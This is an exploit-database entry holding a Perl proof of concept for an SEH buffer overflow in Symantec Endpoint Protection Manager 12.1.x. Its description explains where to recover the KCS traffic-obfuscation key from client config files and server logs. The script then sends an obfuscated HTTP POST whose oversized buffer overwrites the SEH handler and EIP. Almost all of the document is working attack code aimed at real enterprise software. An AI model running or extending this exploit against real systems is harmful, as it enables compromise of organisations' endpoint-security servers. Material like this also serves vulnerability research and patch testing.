Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

2014-04-27T00:00:00
ID 1337DAY-ID-22189
Type zdt
Reporter st3n
Modified 2014-04-27T00:00:00

Description

=====================================================================================

This POC code overwrite EIP with "CCCCCCCC"

About KCS Key: That key is used to obfuscate traffic between client and server.

The key is generated during SEPM installation.

We need that key to talk with the SEPM server..

Where to find KCS Key ?

On a managed client station. Search for "Kcs" inside:

- Win7/Vista/W2k8/and more :

C:\ProgramData\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Config\SyLink.xml

- Windows XP :

C:\Document & Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\

CurrentVersion\Data\Config\SyLink.xml

On server side, check the logs:

C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\data\inbox\log\ersecreg.log

=====================================================================================

                                        
                                            use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
 
 
# SEP Manager host/ip
my $host        = "192.168.60.186";
my $port    = 8014;
 
# Kcs key
my $Kcs_hex     = "85FB05B288B45D92447A3EDCBEFC434E";
 
# ---- config end -----
 
 
 
 
# flush after every write
$| = 1;
 
 
# Send HTTP request function
sub send_request {
        my $param = shift;      # URL parameters
        my $post_data = shift;  # POST DATA
        my $sock = IO::Socket::INET->new("$host:$port");
        if($sock){
                print "Connected.. \n";
 
                # HTTP request
                my $req =
                        "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
                        "User-Agent: Smc\r\n" .
                        "Host: $host\r\n" .
                        "Content-Length: " . length($post_data) . "\r\n" .
                        "\r\n" .
                        $post_data ;
 
                # Sending
                print $sock $req;
 
                # Read HTTP response
                my $resp = '';
                while(<$sock>){ $resp .=$_; }
 
                #print $resp;   
            if($resp =~ /400 Bad Request/) {
                    print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
                        
        }
     
        close $sock;
    }
 
}
 
 
# SEP object
my $sep = SEPM::SEPM->new();
 
 
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
 
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
 
# Obfuscate URL parameters 
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
 
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
         "foo=[hex]" .   # [hex] call the vulnerable parsing function
     "F" x 1288 .    # Junk
     "B" x 8 .       # Pointer to next SEH record
     "CCCCCCCC".     # SEH Handler, will overwrite EIP register 
     "D" x 500;      # Trigger "Memory Access Violation" exception
 
 
# Sending request
print "[*] Sending HTTP request\n";
send_request($h,     # URL parameters
             $buf    # post data        
);
 
 
print "[*] Done\n";

#  0day.today [2018-03-05]  #